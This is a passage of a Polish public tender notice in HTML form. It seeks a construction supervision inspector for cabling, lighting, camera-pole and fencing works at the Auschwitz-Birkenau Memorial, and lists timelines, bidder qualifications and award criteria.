architektury)2.7.7	Zadanie nr 3 - pt : ,,Rozbudowa kanalizacji kablowej, rozbudowa instalacji podziemnych w zakresie linii zasilających eNN, budowa słupów do montażu kamer - na terenie Auschwitz I oraz budowa kanalizacji kablowej, budowa linii zasilających eNN i instalacji oświetlenia, budowa słupów do montażu kamer na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III" tj.2.7.7.1	Roboty według projektu budowlanego pn ,,Budowa ogrodzenia, rozbudowa kanalizacji kablowej, rozbudowa instalacji podziemnych w zakresie linii zasilających eNN, budowa słupów do montażu kamer" w obiekcie Auschwitz I - Oświęcim, tj.a.	budowa kanalizacji kablowej na odcinkach (od punktu do punktu): t25-t27, t26-t31, t32-t33, t35-t38, t37-t39, t02/1-t09/1 (oznaczenia punktów według przynależnego projektu wykonawczego). W zakresie budowy kanalizacji wchodzi również budowa studni kablowych leżących na wskazanych odcinkach wraz z początkowymi i końcowymi studniami kablowymi oraz wprowadzenie kanalizacji do budynków A-77, A-50W i do słupów oświetleniowychb.	budowa uziemienia do słupów stojących przy wskazanych odcinkach kanalizacji (dotyczy zarówno nowych jak i istniejących słupów);c. budowa słupa oznaczonego, jako SL05 (oznaczenia punktu według projektu wykonawczego). W słupie należy przygotować otwory techniczne przeznaczone do przeprowadzenia okablowania dla elektronicznych systemów zabezpieczeń. Otwory powinny być zabezpieczone antykorozyjnie analogicznie do całej powierzchni słupa i zaślepione.d.	budowa słupków ograniczających ruch obok budynków A77 i A37. Ilość słupków należy dobrać tak, aby uniemożliwić przejazd pojazdów o szerokości większych niż 130 cm Zamawiający wymaga zastosowania słupków parkingowych składanych ręcznie o średnicy 100 - 150 mm, bez odporności na staranowanie, stalowych, ocynkowanych ogniowo, malowanych proszkowo, wyposażonych w blokadę z kluczem (zamek klucza zabezpieczony klapką ochronną odporną na korozję). Wszystkie słupki otwierane / zamykane jednym kluczem. 2.7.7.2	według projektu budowlanego pn.: ,,Budowa ogrodzenia, budowa kanalizacji kablowej, budowa linii zasilających eNN i instalacji oświetlenia, budowa słupów do montażu kamer w lokalizacji Auschwitz II - Brzezinka" tj.a.	budowa kanalizacji kablowej na odcinkach (od punktu do punktu): t01-t08, t48-t42-t42/5, t70-t68-t88, t89-t94, t95-t97, t98-t101, t102-t104, t105-t108, t109-t109/3, t110-t112/1 (oznaczenia punktów według przynależnego projektu budowlanego). W zakres budowy kanalizacji wchodzi budowa studni kablowych leżących na wskazanych odcinkach wraz z początkowymi i końcowymi studniami kablowymi oraz wprowadzenie kanalizacji do słupów oświetleniowych;b.	budowa uziemienia do słupów stojących przy wskazanych odcinkach kanalizacji (dotyczy zarówno nowych jak i istniejących słupów).c.	budowa słupów oznaczonych: SL01-SL15. Do słupów należy doprowadzić linie kablowe zasilające oraz wyposażyć je w oprawy oświetleniowe. W słupach należy przygotować otwory techniczne przeznaczone do przeprowadzenia okablowania dla elektronicznych systemów zabezpieczeń. Otwory powinny być zabezpieczone antykorozyjnie analogicznie do całej powierzchni słupa i zaślepione. Zasilanie elektronicznych systemów zabezpieczeń nie wchodzi w zakres zamówienia.2.7.7.3 według projektu budowlanego pn.: ,,Instalacja systemu wczesnego wykrywania pożaru i sygnalizacji alarmu pożaru dla obiektów zabytkowych na terenie Państwowego Muzeum Auschwitz-Birkenau" w lokalizacji Auschwitz II - Brzezinka tj.a.	budowa kanalizacji kablowej na odcinku (od punktu do punktu): t103-t105 (oznaczenia punktów według przynależnego projektu wykonawczego). W zakresie budowy kanalizacji wchodzi budowa studni kablowych leżących na wskazanym odcinku wraz z początkowymi i końcowymi studniami kablowymi;2.7.8	Zadanie nr 4 - pt : ,,Budowa ogrodzenia, na terenie Auschwitz II w ramach Projektu Bezpieczeństwa Miejsca Pamięci Auschwitz- Birkenau etap III".2.7.8.1	Wybudowanie kompletnego ogrodzenia po zewnętrznym obwodzie terenu PMA-B na terenie Auschwitz II od punktu 40 do punktu 58 (według oznaczeń projektu wykonawczego).2.7.8.2	Dostawę bramy D (według oznaczeń projektu wykonawczego) oraz wykonanie fundamentu pod bramę wraz ze słupkami przygotowanymi do jej montażu 2.7.8.3	Demontaż istniejącego szlabanu,2.7.8.4	Wykonanie i przekazanie Zamawiającemu pełnej dokumentacji powykonawczej oraz współpraca z Zamawiającym w celu uzyskania pozwoleń na użytkowanie.2.7.8.5	Pełnienie nadzoru archeologicznego dla wszystkich robót ziemnych.2.7.8.6	Poza zakresem zamówienia pozostaje:a.	Montaż bramy D.UWAGA - Ze względu na okoliczność, że którekolwiek z Zadań może rozpocząć się przed podpisaniem umowy z Inspektorem nadzoru wyłonionym w niniejszym postępowaniu, Zamawiający zastrzega sobie możliwość odstąpienia od realizacji przez Inspektora nadzoru tej części nadzoru, dla której Wykonawca robót wykonał te roboty. Wówczas nastąpi stosowne pomniejszenie wynagrodzenia dla Inspektora Nadzoru zgodnie z zapisami Załącznika nr 5 do SIWZ §10 ust. 1.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">71520000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6 ustawy pzp w zakresie nadzoru inwestorskiego, w tych samych specjalnościach jak dla zamówienia podstawowego, nad wykonaniem robót budowlanych: 2.2.1	dodatkowego ogrodzenia wraz z bramą i infrastrukturą towarzyszącą na terenie Brzezinki na potrzeby Globalnego Planu Konserwacji Zamawiającego 2.2.2. Dodatkowego ogrodzenia na działce 239/7 w obrębie Brzezinka</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">280</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">2.6	Szacunkowy czas trwania Zadań wynosi:2.6.1	dla Zadania 1 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.1. - 18 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Istotnych postanowień umowy (Załącznik nr 5) oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbiorów części lub odbioru końcowego Zadania; 2.6.2	dla Zadania 2 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.2. - 40 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Istotnych postanowień umowy (Załącznik nr 5) oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbiorów części lub odbioru końcowego Zadania. 2.6.3	dla Zadania 3 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.3. - 40 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Istotnych postanowień umowy (Załącznik nr 5) oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbiorów części lub odbioru końcowego Zadania. 2.6.4	dla Zadania 4 określonego w Załączniku nr 5 - Istotne postanowienia umowy(wzór umowy) - w §1 ust. 1 pkt 1.4. - 35 tygodni od rozpoczęcia do zakończenia i odbioru robót budowlanych przez Zamawiającego z zastrzeżeniem wykonywania obowiązków określonych w § 4 ust. 6 Umowy oraz okolicznością, że Inspektor Nadzoru będzie realizował obowiązki bez względu na faktyczne terminy odbioru częściowego lub odbioru końcowego każdego Zadania. Planowany termin rozpoczęcia robót budowlanych:3.2.1	Zadanie 1 - Czerwiec - Lipiec 2018 r.3.2.2	Zadanie 2 - Kwiecień - Czerwiec 2018 r.3.2.3	Zadanie 3 - Czerwiec - Lipiec 2018 r.3.2.4	Zadanie 4 - Marzec - Kwiecień 2018 r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">4.2	Wykonawca, który będzie brał udział w postępowaniu musi spełniać następujące warunki udziału dotyczące:4.2.1	Posiadania zdolności zawodowej tj. wykazania, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które posiadają łącznie: 4.2.1.1	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń, określonych przepisami Ustawy z dnia 7 lipca 1994 r. Prawo budowlane z późn. zmianami, w specjalności podanych w punkcie od 2.3.1 do 2.3.4 SIWZ;4.2.1.2	doświadczenie w postaci, co najmniej 18-miesięcznego udziału w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury zgodnie z art.37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami;4.2.1.3	doświadczenie w pełnieniu funkcji inspektora nadzoru w jednej ze specjalności podanych w punkcie od 2.3.1 do 2.3.4 SIWZ, przez okres co najmniej 3 lat, w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury odbytego zgodnie z art.37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami.4.2.2	Posiadania zdolności technicznej wyrażającej się świadczeniem usług nadzoru inwestorskiego w co najmniej dwóch specjalnościach podanych w punkcie od 2.3.1 do 2.3.4 SIWZ, przez okres co najmniej 18-stu miesięcy.4.2.3	W odniesieniu do inspektora nadzoru inwestorskiego właściwe są uprawnienia budowlane wydawane po 1994 roku (tj. zgodnych z wymogami ustawy z dnia 7 lipca 1994 r. Prawo budowlane z późn. zmianami) lub odpowiadające im, ważne uprawnienia budowlane wydane na podstawie obowiązujących wcześniej właściwych przepisów.4.2.4	Wykonawca ma obowiązek udowodnić Zamawiającemu doświadczenie wymagane w punkcie 4.2.1 SIWZ na zabytkach wpisanych do rejestru zabytków, o których mowa w ustawie z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami lub rejestru zabytków prowadzonego przez organy ustanowione w tym celu przez państwa obce wskazując czasookres pracy (podany, jako dzień, miesiąc i rok rozpoczęcia i analogicznie zakończenia), odpowiednio nr wpisu zabytku do rejestru zabytków, nazwę zabytku, nazwę przedsięwzięcia lub miejsce wykonywania usługi i nazwę podmiotu na rzecz którego były świadczone usługi, rodzaj usługi. Wykonawca ma obowiązek udowodnić Zamawiającemu doświadczenie wymagane w punkcie 4.2.2 SIWZ wskazując czasookres usługi (podany, jako dzień, miesiąc i rok rozpoczęcia i analogicznie zakończenia), nazwę przedsięwzięcia lub miejsce wykonywania usługi i nazwę podmiotu na rzecz którego były świadczone usługi, rodzaj usługi. 4.3	Zamawiający oświadcza, iż w zakresie wykonywania umowy, nie występują czynności, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy. 4.4	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (konsorcjum), mogą spełniać łącznie, warunki udziału w postępowaniu wskazane w sekcji 4 SIWZ. 4.5	Funkcję inspektora nadzoru w specjalnościach instalacyjnych w zakresie sieci, instalacji i urządzeń: 1) elektrycznych i elektroenergetycznych oraz 2) telekomunikacyjnych może sprawować osoba, która łącznie spełnia warunki określone w sekcji 4.2.1 i 4.2.2 SIWZ.4.6	Niespełnienie choćby jednego z warunków skutkować będzie wykluczeniem Wykonawcy z postępowania.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">8.6	Wykonawca, którego oferta zostanie najwyżej oceniona w celu potwierdzenia, że spełnia warunki udziału w postępowaniu zostanie wezwany w wyznaczonym, nie krótszym niż 5 dni terminie do złożenia następujących dokumentów (aktualnych na dzień złożenia dokumentów): 8.6.1	wykaz usług wykonanych, o których mowa w sekcji 4 pkt 4.2 SIWZ, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów na rzecz, których usługi zostały wykonane, - wg. wzoru załącznik nr 4 do SIWZ (Oświadczenie o dysponowaniu kwalifikacjami zawodowymi, dysponowaniu osobami), a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; 8.6.2	wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego posiadających uprawnienia, o których mowa w sekcji 4 ppkt 4.2 SIWZ wraz z informacjami na temat ich kwalifikacji zawodowych, nr uprawnień, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - wg wzoru załącznik nr 4 do SIWZ (Oświadczenie o dysponowaniu kwalifikacjami zawodowymi, dysponowaniu osobami).</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">8.5	W celu potwierdzenia braku podstawy do wykluczenia Wykonawcy z postępowania, z tytułu okoliczności, o której mowa w art. 24 ust. 1 pkt 23 ustawy pzp, każdy Wykonawca składa, stosownie do treści art. 24 ust. 11 p.z.p (w terminie 3 dni od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji z otwarcia ofert, tj. informacji, o których mowa w art. 86 ust. 5 p.z.p), oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 p.z.p. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.9.2	Do oferty należy dołączyć: 9.2.1	oświadczenie o braku podstaw do wykluczenia oraz o spełnieniu warunków udziału w postępowaniu zgodnie z załącznikiem nr 3 i 2 do SIWZ;9.2.2	zobowiązanie innego podmiotu, o którym mowa w sekcji 6 pkt 6.2 SIWZ; 9.2.3	pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie (jeśli dotyczy).</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena ryczałtowa brutto </TD><TD style='border: 1px solid black;border-collapse: collapse;'>59,50</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie osób wyznaczonych do realizacji zamówienia </TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena ryczałtowa brutto za 1 czynność wykonywaną w okresie rękojmi lub gwarancji </TD><TD style='border: 1px solid black;border-collapse: collapse;'>0,50</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span 